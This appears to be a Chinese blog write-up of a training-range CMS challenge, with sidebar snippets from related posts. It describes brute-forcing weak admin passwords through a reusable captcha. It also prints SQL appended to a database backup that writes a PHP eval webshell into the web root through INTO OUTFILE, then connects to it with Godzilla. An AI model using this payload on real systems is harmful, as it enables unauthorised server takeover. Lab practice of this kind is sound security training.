CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2024-05-05 20:06:45 发布
最新推荐文章于 2024-05-05 20:06:45 发布
阅读量683 收藏 5
点赞数
分类专栏: 从入门到入狱 文章标签: 数据库 sql web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/127662033
版权

CMS系统漏洞分析溯源(第6题)

靶场为mozhe中的靶场

访问靶场地址
博客页面找到2个用户名

mozhe666
mozhe777

在这里插入图片描述
目录扫描工具扫到后台

在这里插入图片描述
后台是个带验证码的页面

在这里插入图片描述
这个靶场忘记密码这个功能是不存在,登陆输入框尝试sql注入失败

多次重发同一个包,发现一直提示密码错误,请重新输入。并没有提示验证码错误,说明存在验证码可以共用的漏洞。尝试弱口令爆破上面2个用户

先爆破出mozhe666,密码admin888

在这里插入图片描述
登录后台,写文章的功能试了试好像写不了马

在这里插入图片描述
爆破mozhe777,同样也是弱口令qwer1234

在这里插入图片描述
登录后台,这个功能是真的多应该是管理员

在这里插入图片描述
首先发现了一个上传功能,想传马尝试下没能绕过

在这里插入图片描述
又发现了一个数据库功能,想利用sql语句into outfile直接传马

在这里插入图片描述
先备份数据库导出sql文件,在最后加入

Drop TABLE IF EXISTS tpashell;
Create Table tpashell(`cmd` longtext NOT NULL);
Insert INTO tpashell VALUES('<?php @eval($_POST[tpa]);?>');
Select cmd from tpashell into outfile '/var/www/html/shell.php';
Drop TABLE IF EXISTS tpashell;

在这里插入图片描述
重新导入本地备份

在这里插入图片描述
更新缓存

在这里插入图片描述
哥斯拉连下,拿下flag

在这里插入图片描述

tpaer
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cms靶场联合查询漏洞练习
Have_a_great_day的博客
08-27 373
1、联合查询:通过数据库的内容会回显到页面。利用union select 语句,该语句会同时执行两条select语句,来实现跨库,跨表查询。必要条件:1.两条select 语句查询结果具有相同的列数;2.对应的列数据类型一致。
web渗透cms靶场
weixin_49794194的博客
01-10 690
主页测试了很多地方漏洞还是比较多的,可能是系统比较老的原因,但是我们的目标主要是文件上传拿下webshell,这里我们找到了会员注册 然后成功跳转会员中心,发现可以插入新的新闻,或者上传个人头像 这里首先哥斯拉的php后缀改为jpg,因为这个靶场是文件类型验证,burp抓传数据包 将第21行的filename jpg更改为php上传,上传之后f12查看网页源代码看看文件被插去哪里了 这里看到data有会员资料上传的php应该是上传之后重命名,我们直接打开哥斯拉连接 连接成功ipconfig,渗渗透靶场结束
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
最新发布
2401_84263282的博客
05-05 972
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
万变不离其宗-掌控者靶场之bluecms1.6漏洞
cainsoftware的博客
07-26 2547
拿到 睁大眼就能看见底下的 bluecms 1.6 百度了一下漏洞位置 学习了PW的姿势 SQL注入位置 http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1 Order by 7 字段长度为7 注入表名payload: ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_sc..
CMS系统漏洞分析溯源(第5)——解视频全过程
渗透测试
09-07 672
CMS系统漏洞分析溯源(第5) 解思路: 登陆页面>>>扫描后台地址>>>登陆地址>>>查看是否可以绕过>>>不可以的话>>>百度管理系统源码>>>分析源码>>>查看登陆页面>>>找到相关php文件>>>admin_name>>>浏览器添加cookie>>>直接访问带有漏洞php文件的页面>>&
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载.txt
05-06
PHP漏洞挖掘(六):PHP常见CMS漏洞分析——课程资源百度网盘下载,亲测真实有效可用!包含视频+课程资料.zip,在知识星球中也分享了该资源,知识星球:W小哥
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
某团cms系统官网源码.zip
08-14
【某团CMS系统官网源码】是一个基于Java技术构建的内容管理系统,主要用于网站的建设和管理。这个源码包包含了实现该系统的基本元素,如HTML页面、图片资源等,为开发者提供了研究和二次开发的基础。 首先,我们要...
74cms v4.2.X任意文件读取漏洞
09-06
**74cms v4.2.X任意文件读取漏洞详解** 在网络安全领域,74cms v4.2.X任意文件读取漏洞是一个重要的安全,影响了74cms的多个版本,包括v4.2、v4.2.3以及v5.0.1。这个漏洞允许攻击者通过特定的手段读取服务器上...
极致CMS 1.7 审计与渗透测试
feng的博客
04-04 1783
前言 几天前在先知上看到了Firebasky师傅在先知上发的关于极致CMS渗透测试。这个CMS的洞虽然已经公布了很久,但是因为自己还是太菜,基本上没有怎么接触过多少CMS,因此就从网上把极致CMS下载了下来,在本地搭建了一下环境来测试。 github上的极致CMS 这里我下载的是1.7版本,考虑到1.9版本可能大多数的洞都修了,就不好玩了,先把1.7试一遍,再搭一下1.9版本的看看。这篇文章相对来说会很乱,因为行文的思路是我随手乱试思路了。 后台上传文件 本地搭建一下,设置一下管理员账号和密码,直接自己登
CMS漏洞复现
qq_44832048的博客
07-19 9783
dedeCMS (CNVD-2018-01221) 类型: phpcms系统:dedecms、帝国cmsphp168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1963
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
墨者靶场 中级:CMS系统漏洞分析溯源(第2
qq_43233085的博客
01-17 678
墨者靶场 中级:CMS系统漏洞分析溯源(第2目背景介绍实训目标解方向解步骤 目 背景介绍 某单位需新上线了一个系统,安全工程师“墨者”负责对系统的安全检测,确保该系统在上线后不存在安全漏洞。 实训目标 1、了解并熟练使用linux命令; 2、了解PHPCMS的后台地址及其他相关漏洞资料; 3、了解html源码的重要性。 解方向 登录后台后执行linux系统命令,查看web源码。 解...
记一次艰难的多节点YXcms靶场内网渗透
爱国小白帽
03-20 4895
Yxcms是一款高效,灵活,实用,免费的企业建站系统,基于PHP和mysql技术,采用MVC三层架构,后台登录账号是admin密码123456 下载链接:https://pan.baidu.com/s/1S0FdqGRUSJ2edEp_p-wi9g 提取码:77jz 文章目录渗透目标及工具:环境安装:渗透过程:1、获取webshell2、找到第一个flag3、找到第二个flag4、找到第三个f...
墨者学院---CMS系统漏洞分析溯源(第5)
qq_35105713的博客
10-25 1165
 cookie添加 admin_name字段,Value任意。保存 访问http://219.153.49.228:48489/admin/cms_admin.php,即可获得key
多节点靶场(1)--Yxcms靶场分析
u012335061的博客
11-22 2981
**** 多节点靶场(1)–Yxcms靶场分析** **链接: 任务:找找flag,一共有三个: 已经知道是yxcms,可以去网上看一下,这个cms爆出过什么漏洞,可以复现一下 Yxcms登录后台地址:http://192.168.100.130/index.php?r=admin/index/login Yxcms后台登录页面存在弱口令,默认用户密码是...
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了各种漏洞安全供你尝试攻击和修复。 DVWA是一个非常受欢迎的靶场CMS,它包含了多个安全漏洞,例如SQL注入、跨站脚本攻击(XSS)和文件上传漏洞等。OWASP Juice Shop是一个现代化的Web应用程序,旨在模拟真实世界中常见的安全WebGoat是另一个非常受欢迎的靶场CMS,它提供了一系列挑战和实验,帮助你学习各种Web应用程序漏洞。 通过使用这些靶场CMS,你可以积极主动地学习和测试不同类型的Web应用程序漏洞,提高你的渗透测试技能。记得在使用靶场CMS进行渗透测试时,要遵守法律和道德规范,并且只在合法的环境中进行测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值